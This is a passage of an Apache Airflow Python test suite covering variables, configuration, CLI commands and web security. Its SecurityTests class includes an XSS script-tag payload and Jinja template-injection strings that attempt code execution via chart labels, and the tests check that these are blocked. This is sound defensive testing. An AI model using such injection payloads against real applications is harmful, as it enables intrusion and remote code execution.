def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', 'conn_type', 'conn_host', 'conn_login', 'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
import subprocess
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
import subprocess
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import subprocess
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_bash2 = self.dagbag.dags['test_example_bash_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_bash2 = self.dag_bash2.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
